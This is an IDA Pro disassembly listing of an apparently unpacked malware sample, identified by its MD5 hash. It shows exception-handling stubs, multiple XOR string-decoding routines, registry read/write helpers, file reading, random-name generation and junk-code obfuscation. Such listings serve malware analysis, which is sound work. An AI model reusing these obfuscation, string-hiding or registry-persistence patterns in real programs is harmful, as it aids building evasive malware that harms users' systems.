;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 9BBDD086C53E8ECE6EB841C3296BE2AE
; ---------------------------------------------------------------------------
; File Name : u:\work\9bbdd086c53e8ece6eb841c3296be2ae_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0004C000 ( 311296.)
; Section size in file : 0004A200 ( 303616.)
; Offset to raw data for section: 00000400
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
loc_401000: ; DATA XREF: sub_401020+A�o
; sub_43EFBD+A�o
xor eax, eax
inc eax
mov ecx, [esp+4]
test dword ptr [ecx+4], 6
jz short locret_40101F
mov eax, [esp+8]
mov edx, [esp+10h]
mov [edx], eax
mov eax, 3
locret_40101F: ; CODE XREF: .text:0040100E�j
retn
; =============== S U B R O U T I N E =======================================
sub_401020 proc near ; CODE XREF: sub_40109A+BE�p
; sub_40109A+EC�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset loc_401000
push large dword ptr fs:0
mov large fs:0, esp
loc_40103D: ; CODE XREF: sub_401020+44�j
; sub_401020+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_40106C
cmp esi, [esp+1Ch+arg_4]
jz short loc_40106C
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_40103D
call dword ptr [ebx+esi*4+8]
jmp short loc_40103D
; ---------------------------------------------------------------------------
loc_40106C: ; CODE XREF: sub_401020+2A�j
; sub_401020+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_401020 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40107A proc near ; CODE XREF: sub_40109A+B1�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_401092
push [ebp+arg_0]
call RtlUnwind ; RtlUnwind
loc_401092: ; DATA XREF: sub_40107A+B�o
; sub_43F017+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_40107A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40109A proc near ; DATA XREF: start+10�o StartAddress+A�o ...
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
cld
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
mov dword_43C08C, eax
mov dword_43C090, ebx
test dword ptr [eax+4], 6
jnz loc_40117F
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
mov dword_43C090, eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_4010DD: ; CODE XREF: sub_40109A+DC�j
cmp esi, 0FFFFFFFFh
jz loc_40118E
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_40116D
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp+var_14]
mov eax, [eax]
mov eax, [eax]
mov dword_43C030, eax
mov edx, [ebp+var_14]
mov eax, [edx]
mov dword_43C034, eax
mov eax, [edx+4]
mov dword_43C038, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, dword_43C03C
mov esi, dword_43C034
rep movsd
lea edi, dword_43C03C
mov dword_43C034, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_40116D
js short loc_40117B
mov edi, [ebx+8]
push ebx
call sub_40107A
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_401020
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_40116D: ; CODE XREF: sub_40109A+54�j
; sub_40109A+A9�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_4010DD
; ---------------------------------------------------------------------------
loc_40117B: ; CODE XREF: sub_40109A+AB�j
xor eax, eax
jmp short loc_4011F0
; ---------------------------------------------------------------------------
loc_40117F: ; CODE XREF: sub_40109A+23�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_401020
add esp, 0Ch
loc_40118E: ; CODE XREF: sub_40109A+46�j
push 0
mov dword_43C010, 0Bh
push 0Bh
call signal ; signal
add esp, 8
or eax, eax
jnz short loc_4011C9
push 0
mov dword_43C010, 8
push 8
call signal ; signal
add esp, 8
or eax, eax
jnz short loc_4011C9
mov eax, 1
jmp short loc_4011F0
; ---------------------------------------------------------------------------
loc_4011C9: ; CODE XREF: sub_40109A+10C�j
; sub_40109A+126�j
cmp eax, 0FFFFFFFFh
jz short loc_4011F8
push eax
push dword_43C010
call signal ; signal
add esp, 8
push dword_43C010
call raise ; raise
add esp, 4
mov eax, 1
loc_4011F0: ; CODE XREF: sub_40109A+E3�j
; sub_40109A+12D�j ...
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4011F8: ; CODE XREF: sub_40109A+132�j
cmp dword_43C02C, 0
jnz short loc_401208
mov eax, 1
jmp short loc_4011F0
; ---------------------------------------------------------------------------
loc_401208: ; CODE XREF: sub_40109A+165�j
mov eax, dword_43C02C
push 0Bh
jmp eax
sub_40109A endp
; ---------------------------------------------------------------------------
pop eax
mov eax, 1
jmp short loc_4011F0
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
public start
start proc near ; CODE XREF: .text:0044A501�j
; DATA XREF: .text:loc_44A4FC�o
var_30 = word ptr -30h
var_18 = dword ptr -18h
var_4 = dword ptr -4
mov eax, large fs:0
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43C01C
push offset sub_40109A
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_18], esp
push eax
fnstcw [esp+30h+var_30]
or [esp+30h+var_30], 300h
fldcw [esp+30h+var_30]
add esp, 4
push 0
push 0
push offset dword_43C028
push offset dword_43C024
push offset dword_43C020
call __GetMainArgs
push dword_43C028
push dword_43C024
push dword_43C020
mov dword_43C014, esp
call sub_40C654
add esp, 18h
xor ecx, ecx
mov [ebp+var_4], ecx
push eax ; Code
call exit ; exit
start endp
; ---------------------------------------------------------------------------
leave
retn
; ---------------------------------------------------------------------------
mov large fs:0, eax
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40129C(void *Src, size_t Size)
sub_40129C proc near ; CODE XREF: sub_408ED0+23�p
; sub_408ED0+3F�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Src = dword ptr 8
Size = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+Size]
push esi ; Size
push [ebp+Src] ; Src
mov eax, dword_43C09C
lea eax, ds:41B7B0h[eax]
push eax ; Dst
call memcpy ; memcpy
add esp, 0Ch
mov [ebp+var_4], 14Bh
xor edi, edi
jmp short loc_4012E5
; ---------------------------------------------------------------------------
loc_4012CB: ; CODE XREF: sub_40129C+4B�j
mov eax, dword_43C09C
add eax, edi
lea eax, ds:41B7B0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0D4h
mov [eax], dl
inc edi
loc_4012E5: ; CODE XREF: sub_40129C+2D�j
cmp edi, esi
jl short loc_4012CB
mov [ebp+var_8], 286h
mov eax, dword_43C09C
add eax, esi
mov byte ptr dword_41B7B0[eax], 0
xor edi, edi
mov edi, dword_43C09C
inc dword_43C09C
mov eax, dword_43C09C
add eax, 5
add eax, esi
mov dword_43C09C, eax
cmp eax, 0E0Eh
jle short loc_40132A
and dword_43C09C, 0
loc_40132A: ; CODE XREF: sub_40129C+85�j
mov [ebp+var_C], 3DBh
lea eax, dword_41B7B0[edi]
pop edi
pop esi
leave
retn
sub_40129C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40133B proc near ; CODE XREF: sub_408048+118�p
var_14C1C = dword ptr -14C1Ch
var_14C18 = dword ptr -14C18h
NumberOfBytesRead= dword ptr -14C14h
Buffer = byte ptr -14C10h
var_8 = dword ptr -8
var_2 = word ptr -2
push ebp
mov ebp, esp
mov eax, 14C1Ch
call sub_40C6B8
push ebx
push esi
push edi
call GetCurrentProcessId ; GetCurrentProcessId
mov eax, dword_43C22C
mov [ebp+var_14C18], eax
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 0 ; dwShareMode
push 80000000h ; dwDesiredAccess
push offset FileName ; lpFileName
call CreateFileA ; CreateFileA
mov esi, eax
mov ebx, 1CA5h
sub ebx, 77B7h
cmp esi, 0FFFFFFFFh
jnz short loc_40138D
xor eax, eax
jmp loc_401420
; ---------------------------------------------------------------------------
loc_40138D: ; CODE XREF: sub_40133B+49�j
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
push 14C08h ; nNumberOfBytesToRead
lea eax, [ebp+Buffer]
push eax ; lpBuffer
push esi ; hFile
call ReadFile ; ReadFile
mov [ebp+var_2], 434Fh
movzx eax, [ebp+var_2]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2], ax
push esi ; hObject
call CloseHandle ; CloseHandle
mov [ebp+var_8], 67B8h
mov eax, 79B5h
mul [ebp+var_8]
mov [ebp+var_14C1C], eax
mov [ebp+var_8], eax
xor edi, edi
loc_4013DC: ; CODE XREF: sub_40133B+DC�j
mov eax, 13h
sub eax, dword_43C098
push eax
push offset Format
lea eax, [ebp+edi+Buffer]
push eax
call sub_40181A
add esp, 0Ch
cmp eax, 0FFFFh
jz short loc_401409
xor eax, eax
inc eax
jmp short loc_401420
; ---------------------------------------------------------------------------
loc_401409: ; CODE XREF: sub_40133B+C7�j
call GetCurrentProcessId ; GetCurrentProcessId
add edi, 11h
cmp edi, [ebp+NumberOfBytesRead]
jb short loc_4013DC
call GetVersion ; GetVersion
xor eax, eax
loc_401420: ; CODE XREF: sub_40133B+4D�j
; sub_40133B+CC�j
pop edi
pop esi
pop ebx
leave
retn
sub_40133B endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 2A0h
push esi
push dword ptr [ebp+8]
mov eax, dword_43C23C
lea eax, ds:41A7F0h[eax]
push eax
call memcpy ; memcpy
add esp, 0Ch
mov dword ptr [ebp-8], 2B3h
xor edi, edi
jmp short loc_401475
; ---------------------------------------------------------------------------
loc_40145B: ; CODE XREF: .text:00401477�j
mov eax, dword_43C23C
add eax, edi
lea eax, ds:41A7F0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0F6h
mov [eax], dl
inc edi
loc_401475: ; CODE XREF: .text:00401459�j
cmp edi, esi
jl short loc_40145B
mov dword ptr [ebp-0Ch], 25h
mov eax, dword_43C23C
add eax, esi
mov byte ptr dword_41A7F0[eax], 0
mov edi, dword_43C23C
inc dword_43C23C
mov eax, dword_43C23C
add eax, 5
add eax, esi
mov dword_43C23C, eax
cmp eax, 0E06h
jle short loc_4014B8
and dword_43C23C, 0
loc_4014B8: ; CODE XREF: .text:004014AF�j
mov dword ptr [ebp-10h], 20Bh
lea eax, dword_41A7F0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4014C9(HKEY hKey, LPCSTR lpSubKey, LPCSTR lpValueName, LPBYTE lpData, LPDWORD lpcbData, LPDWORD lpType)
sub_4014C9 proc near ; CODE XREF: sub_4061F7+E1�p
; sub_408B4C+128�p ...
var_10 = dword ptr -10h
var_9 = byte ptr -9
phkResult = dword ptr -8
var_4 = word ptr -4
var_1 = byte ptr -1
hKey = dword ptr 8
lpSubKey = dword ptr 0Ch
lpValueName = dword ptr 10h
lpData = dword ptr 14h
lpcbData = dword ptr 18h
lpType = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
mov [ebp+var_4], 19C3h
sub [ebp+var_4], 4EAAh
mov [ebp+var_1], 19h
movzx eax, [ebp+var_1]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1], al
lea eax, [ebp+phkResult]
push eax ; phkResult
push 20019h ; samDesired
push 0 ; ulOptions
push [ebp+lpSubKey] ; lpSubKey
push [ebp+hKey] ; hKey
call RegOpenKeyExA ; RegOpenKeyExA
mov edi, eax
mov esi, 2238h
mov eax, 5994h
mul esi
mov [ebp+var_10], eax
mov esi, eax
or edi, edi
jz short loc_40151F
xor eax, eax
jmp short loc_40156A
; ---------------------------------------------------------------------------
loc_40151F: ; CODE XREF: sub_4014C9+50�j
call GetVersion ; GetVersion
push [ebp+lpcbData] ; lpcbData
push [ebp+lpData] ; lpData
push [ebp+lpType] ; lpType
push 0 ; lpReserved
push [ebp+lpValueName] ; lpValueName
push [ebp+phkResult] ; hKey
call RegQueryValueExA ; RegQueryValueExA
mov edi, eax
mov [ebp+var_9], 0B0h
movzx eax, [ebp+var_9]
imul eax, 38BBh
mov [ebp+var_9], al
push [ebp+phkResult] ; hKey
call RegCloseKey ; RegCloseKey
call GetLastError
or edi, edi
jz short loc_401562
xor eax, eax
jmp short loc_40156A
; ---------------------------------------------------------------------------
loc_401562: ; CODE XREF: sub_4014C9+93�j
call GetLastError
xor eax, eax
inc eax
loc_40156A: ; CODE XREF: sub_4014C9+54�j
; sub_4014C9+97�j
pop edi
pop esi
leave
retn
sub_4014C9 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 3A7h
push esi
push dword ptr [ebp+8]
mov eax, dword_43C248
lea eax, ds:4351E0h[eax]
push eax
call memcpy ; memcpy
add esp, 0Ch
xor edi, edi
jmp short loc_4015B4
; ---------------------------------------------------------------------------
loc_40159D: ; CODE XREF: .text:004015B6�j
mov eax, dword_43C248
add eax, edi
lea eax, ds:4351E0h[eax]
movsx edx, byte ptr [eax]
xor edx, 35h
mov [eax], dl
inc edi
loc_4015B4: ; CODE XREF: .text:0040159B�j
cmp edi, esi
jl short loc_40159D
mov dword ptr [ebp-8], 249h
mov eax, dword_43C248
add eax, esi
mov byte ptr dword_4351E0[eax], 0
mov edi, dword_43C248
mov eax, edi
add eax, 6
add eax, esi
mov dword_43C248, eax
inc dword_43C248
cmp dword_43C248, 0DC9h
jle short loc_4015F9
and dword_43C248, 0
loc_4015F9: ; CODE XREF: .text:004015F0�j
mov dword ptr [ebp-0Ch], 114h
lea eax, dword_4351E0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40160A(HKEY hKey, LPCSTR lpSubKey, LPCSTR lpValueName, BYTE *lpData, DWORD cbData, DWORD dwType)
sub_40160A proc near ; CODE XREF: sub_405E88+9C�p
; sub_405E88+D9�p ...
dwDisposition = dword ptr -10h
var_A = word ptr -0Ah
phkResult = dword ptr -8
var_1 = byte ptr -1
hKey = dword ptr 8
lpSubKey = dword ptr 0Ch
lpValueName = dword ptr 10h
lpData = dword ptr 14h
cbData = dword ptr 18h
dwType = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 10h
push edi
call GetCurrentThreadId ; GetCurrentThreadId
mov [ebp+var_A], 6A47h
add [ebp+var_A], 5A3h
lea eax, [ebp+dwDisposition]
push eax ; lpdwDisposition
lea eax, [ebp+phkResult]
push eax ; phkResult
push 0 ; lpSecurityAttributes
push 0F003Fh ; samDesired
push 0 ; dwOptions
push 0 ; lpClass
push 0 ; Reserved
push [ebp+lpSubKey] ; lpSubKey
push [ebp+hKey] ; hKey
call RegCreateKeyExA ; RegCreateKeyExA
mov edi, eax
call GetVersion ; GetVersion
or edi, edi
jz short loc_401651
xor eax, eax
jmp short loc_4016AE
; ---------------------------------------------------------------------------
loc_401651: ; CODE XREF: sub_40160A+41�j
call GetVersion ; GetVersion
push [ebp+cbData] ; cbData
push [ebp+lpData] ; lpData
push [ebp+dwType] ; dwType
push 0 ; Reserved
push [ebp+lpValueName] ; lpValueName
push [ebp+phkResult] ; hKey
call RegSetValueExA ; RegSetValueExA
mov edi, eax
call GetCurrentProcessId ; GetCurrentProcessId
push [ebp+phkResult] ; hKey
call RegCloseKey ; RegCloseKey
mov [ebp+var_1], 14h
movzx eax, [ebp+var_1]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1], al
or edi, edi
jz short loc_401694
xor eax, eax
jmp short loc_4016AE
; ---------------------------------------------------------------------------
loc_401694: ; CODE XREF: sub_40160A+84�j
call GetCurrentThreadId ; GetCurrentThreadId
cmp [ebp+dwDisposition], 1
jnz short loc_4016A6
mov eax, 2
jmp short loc_4016AE
; ---------------------------------------------------------------------------
loc_4016A6: ; CODE XREF: sub_40160A+93�j
call GetVersion ; GetVersion
xor eax, eax
inc eax
loc_4016AE: ; CODE XREF: sub_40160A+45�j
; sub_40160A+88�j ...
pop edi
leave
retn
sub_40160A endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_43C254
lea eax, ds:4383E0h[eax]
push eax
call memcpy ; memcpy
add esp, 0Ch
xor edi, edi
jmp short loc_4016F0
; ---------------------------------------------------------------------------
loc_4016D6: ; CODE XREF: .text:004016F2�j
mov eax, dword_43C254
add eax, edi
lea eax, ds:4383E0h[eax]
movsx edx, byte ptr [eax]
xor edx, 93h
mov [eax], dl
inc edi
loc_4016F0: ; CODE XREF: .text:004016D4�j
cmp edi, esi
jl short loc_4016D6
mov eax, dword_43C254
add eax, esi
mov byte ptr dword_4383E0[eax], 0
xor edi, edi
mov edi, dword_43C254
mov eax, edi
add eax, 4
add eax, esi
mov dword_43C254, eax
cmp eax, 0DEEh
jle short loc_401725
and dword_43C254, 0
loc_401725: ; CODE XREF: .text:0040171C�j
lea eax, dword_4383E0[edi]
pop edi
pop esi
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40172F proc near ; CODE XREF: sub_4054C8+159�p
; sub_408B4C+74�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call GetVersion ; GetVersion
call GetCurrentThreadId ; GetCurrentThreadId
xor esi, esi
jmp short loc_40176B
; ---------------------------------------------------------------------------
loc_401746: ; CODE XREF: sub_40172F+3F�j
call rand ; rand
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov edi, eax
add edi, 61h
mov edx, edi
mov [ebx+esi], dl
inc esi
loc_40176B: ; CODE XREF: sub_40172F+15�j
cmp esi, [ebp+arg_4]
jl short loc_401746
mov eax, [ebp+arg_4]
mov byte ptr [ebx+eax], 0
mov eax, ebx
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40172F endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 12Bh
push esi
push dword ptr [ebp+8]
mov eax, dword_43C260
lea eax, ds:42FB20h[eax]
push eax
call memcpy ; memcpy
add esp, 0Ch
mov dword ptr [ebp-8], 283h
xor edi, edi
jmp short loc_4017CB
; ---------------------------------------------------------------------------
loc_4017B4: ; CODE XREF: .text:004017CD�j
mov eax, dword_43C260
add eax, edi
lea eax, ds:42FB20h[eax]
movsx edx, byte ptr [eax]
xor edx, 7Bh
mov [eax], dl
inc edi
loc_4017CB: ; CODE XREF: .text:004017B2�j
cmp edi, esi
jl short loc_4017B4
mov dword ptr [ebp-0Ch], 10Ch
mov eax, dword_43C260
add eax, esi
mov byte ptr dword_42FB20[eax], 0
xor edi, edi
mov edi, dword_43C260
add dword_43C260, 3
mov eax, dword_43C260
lea eax, [eax+esi+3]
mov dword_43C260, eax
cmp eax, 0DEDh
jle short loc_401810
and dword_43C260, 0
loc_401810: ; CODE XREF: .text:00401807�j
lea eax, dword_42FB20[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40181A proc near ; CODE XREF: sub_40133B+BA�p
; sub_40523D:loc_4052A8�p ...
var_24 = dword ptr -24h
var_1E = byte ptr -1Eh
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = dword ptr -11h
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
push ebx
push esi
push edi
mov [ebp+var_D], 0C0h
sub [ebp+var_D], 75h
and [ebp+var_C], 0
mov eax, dword_43C264
mov [ebp+var_11], eax
and [ebp+var_8], 0
jmp loc_4018EA
; ---------------------------------------------------------------------------
loc_401840: ; CODE XREF: sub_40181A+E2�j
call GetLastError
and [ebp+var_4], 0
mov [ebp+var_12], 0D8h
movzx eax, [ebp+var_12]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_12], al
xor ebx, ebx
jmp short loc_4018D0
; ---------------------------------------------------------------------------
loc_40185E: ; CODE XREF: sub_40181A+C7�j
call GetTickCount ; GetTickCount
mov eax, [ebp+var_8]
add eax, ebx
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx+eax]
mov edx, [ebp+arg_4]
movsx edx, byte ptr [edx+ebx]
cmp eax, edx
jnz short loc_40187D
inc [ebp+var_4]
loc_40187D: ; CODE XREF: sub_40181A+5E�j
mov eax, [ebp+arg_4]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_401885: ; CODE XREF: sub_40181A+70�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_401885
cmp [ebp+var_4], eax
jnz short loc_4018CF
call GetCurrentProcessId ; GetCurrentProcessId
inc [ebp+var_C]
mov [ebp+var_18], 5F0h
mov eax, 4B0Ah
mul [ebp+var_18]
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov [ebp+var_18], eax
mov eax, [ebp+arg_8]
cmp [ebp+var_C], eax
jnz short loc_4018BE
mov eax, [ebp+var_8]
jmp short loc_401907
; ---------------------------------------------------------------------------
loc_4018BE: ; CODE XREF: sub_40181A+9D�j
lea edi, [ebp+var_1E]
lea esi, dword_43C268
mov ecx, 3
rep movsw
loc_4018CF: ; CODE XREF: sub_40181A+75�j
inc ebx
loc_4018D0: ; CODE XREF: sub_40181A+42�j
mov eax, [ebp+arg_4]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_4018D8: ; CODE XREF: sub_40181A+C3�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4018D8
cmp ebx, eax
jb loc_40185E
inc [ebp+var_8]
loc_4018EA: ; CODE XREF: sub_40181A+21�j
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_4018F2: ; CODE XREF: sub_40181A+DD�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4018F2
cmp [ebp+var_8], eax
jb loc_401840
mov eax, 0FFFFh
loc_401907: ; CODE XREF: sub_40181A+A2�j
pop edi
pop esi
pop ebx
leave
retn
sub_40181A endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_43C278
lea eax, ds:4166F0h[eax]
push eax
call memcpy ; memcpy
add esp, 0Ch
mov dword ptr [ebp-4], 2A0h
xor edi, edi
jmp short loc_401952
; ---------------------------------------------------------------------------
loc_40193B: ; CODE XREF: .text:00401954�j
mov eax, dword_43C278
add eax, edi
lea eax, ds:4166F0h[eax]
movsx edx, byte ptr [eax]
xor edx, 1Bh
mov [eax], dl
inc edi
loc_401952: ; CODE XREF: .text:00401939�j
cmp edi, esi
jl short loc_40193B
mov dword ptr [ebp-8], 29Ch
mov eax, dword_43C278
add eax, esi
mov byte ptr dword_4166F0[eax], 0
mov edi, dword_43C278
mov eax, edi
inc eax
add eax, esi
mov dword_43C278, eax
cmp eax, 0DDFh
jle short loc_40198A
and dword_43C278, 0
loc_40198A: ; CODE XREF: .text:00401981�j
mov dword ptr [ebp-0Ch], 0D8h
lea eax, dword_4166F0[edi]
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
call GetVersion ; GetVersion
lea edi, [ebp-6]
lea esi, aVlvh_ ; "vlVh_"
mov ecx, 3
rep movsw
mov ebx, [ebp+10h]
jmp short loc_4019DB
; ---------------------------------------------------------------------------
loc_4019BE: ; CODE XREF: .text:004019DE�j
mov eax, [ebp+8]
movsx eax, byte ptr [eax+ebx]
mov edx, ebx
sub edx, [ebp+10h]
mov ecx, [ebp+0Ch]
movsx edx, byte ptr [ecx+edx]
cmp eax, edx
jz short loc_4019DA
xor eax, eax
inc eax
jmp short loc_4019E2
; ---------------------------------------------------------------------------
loc_4019DA: ; CODE XREF: .text:004019D3�j
inc ebx
loc_4019DB: ; CODE XREF: .text:004019BC�j
cmp ebx, [ebp+14h]
jl short loc_4019BE
xor eax, eax
loc_4019E2: ; CODE XREF: .text:004019D8�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 3DDh
push esi
push dword ptr [ebp+8]
mov eax, dword_43C28C
lea eax, ds:4340E0h[eax]
push eax
call memcpy ; memcpy
add esp, 0Ch
mov dword ptr [ebp-8], 38Eh
xor edi, edi
jmp short loc_401A34
; ---------------------------------------------------------------------------
loc_401A1D: ; CODE XREF: .text:00401A36�j
mov eax, dword_43C28C
add eax, edi
lea eax, ds:4340E0h[eax]
movsx edx, byte ptr [eax]
xor edx, 76h
mov [eax], dl
inc edi
loc_401A34: ; CODE XREF: .text:00401A1B�j
cmp edi, esi
jl short loc_401A1D
mov dword ptr [ebp-0Ch], 3E6h
mov eax, dword_43C28C
add eax, esi
mov byte ptr dword_4340E0[eax], 0
mov edi, dword_43C28C
mov eax, edi
lea eax, [eax+esi+5]
mov dword_43C28C, eax
cmp eax, 0DD0h
jle short loc_401A6D
and dword_43C28C, 0
loc_401A6D: ; CODE XREF: .text:00401A64�j
mov dword ptr [ebp-10h], 1E0h
lea eax, dword_4340E0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401A7E(LPCSTR lpFileName, int)
sub_401A7E proc near ; CODE XREF: sub_4054C8+51�p
; sub_4061F7+4B2�p ...
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_1 = byte ptr -1
lpFileName = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_1], 0C3h
add [ebp+var_1], 29h
push 0 ; hTemplateFile
push 80h ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 3 ; dwShareMode
push 80000000h ; dwDesiredAccess
push [ebp+lpFileName] ; lpFileName
call CreateFileA ; CreateFileA
mov edi, eax
call GetCurrentProcessId ; GetCurrentProcessId
cmp edi, 0FFFFFFFFh
jnz short loc_401ACF
mov ax, word_43C290
mov [ebp+var_E], ax
cmp [ebp+arg_4], 0
jz short loc_401ACB
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
loc_401ACB: ; CODE XREF: sub_401A7E+45�j
xor eax, eax
jmp short loc_401B1C
; ---------------------------------------------------------------------------
loc_401ACF: ; CODE XREF: sub_401A7E+35�j
push 0 ; lpFileSizeHigh
push edi ; hFile
call GetFileSize ; GetFileSize
mov esi, eax
add eax, 10h
push eax ; uBytes
push 40h ; uFlags
call LocalAlloc ; LocalAlloc
mov ebx, eax
call GetCurrentProcessId ; GetCurrentProcessId
push 0 ; lpOverlapped
cmp [ebp+arg_4], 0
jz short loc_401AFB
mov eax, [ebp+arg_4]
mov [ebp-10h], eax
